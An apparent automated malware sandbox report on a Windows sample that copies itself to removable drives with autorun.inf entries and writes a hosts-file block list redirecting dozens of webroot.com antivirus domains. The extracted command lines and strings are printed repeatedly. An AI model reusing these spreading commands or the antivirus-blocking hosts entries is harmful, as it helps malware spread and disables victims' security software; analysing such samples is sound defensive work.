
Windows Analysis Report
IPrstVM17M.exe

Overview

General Information

Sample name: IPrstVM17M.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name: 3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448
Analysis ID: 1430905
MD5: a23b11e50c1f6fcdb42d3b2582524e2f
SHA1: 8b54ea0bc8e4545759e0ea82d28fd608fe0d97ee
SHA256: 3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Queries Google from non browser process on port 80
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files

Classification

  • System is w10x64
  • IPrstVM17M.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\IPrstVM17M.exe" MD5: A23B11E50C1F6FCDB42D3B2582524E2F)
    • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4856 cmdline: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 5024 cmdline: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 6368 cmdline: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 6788 cmdline: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 4788 cmdline: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 7152 cmdline: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 6596 cmdline: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe", CommandLine: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\IPrstVM17M.exe", ParentImage: C:\Users\user\Desktop\IPrstVM17M.exe, ParentProcessId: 5812, ParentProcessName: IPrstVM17M.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe", ProcessId: 4856, ProcessName: cmd.exe
No Snort rule has matched


AV Detection

Source: IPrstVM17M.exe; ReversingLabs: Detection: 15%
Source: IPrstVM17M.exe; Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Local\Temp\bin.exe; Joe Sandbox ML: detected
Source: IPrstVM17M.exe; Joe Sandbox ML: detected
Source: IPrstVM17M.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 52.173.151.229:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.161.186:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: IPrstVM17M.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb source: IPrstVM17M.exe, bin.exe.3.dr
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb'' source: IPrstVM17M.exe, bin.exe.3.dr
Source: IPrstVM17M.exe; Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe; Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe; Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe; Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 
provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe | Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe | Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe | Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe | Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe | Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: bin.exe.3.dr | Binary or memory string: echo [autorun] > D:\autorun.inf
Source: bin.exe.3.dr | Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: bin.exe.3.dr | Binary or memory string: echo [autorun] > E:\autorun.inf
Source: bin.exe.3.dr | Binary or memory string: echo open=bin.exe >> E:\autorun.inf
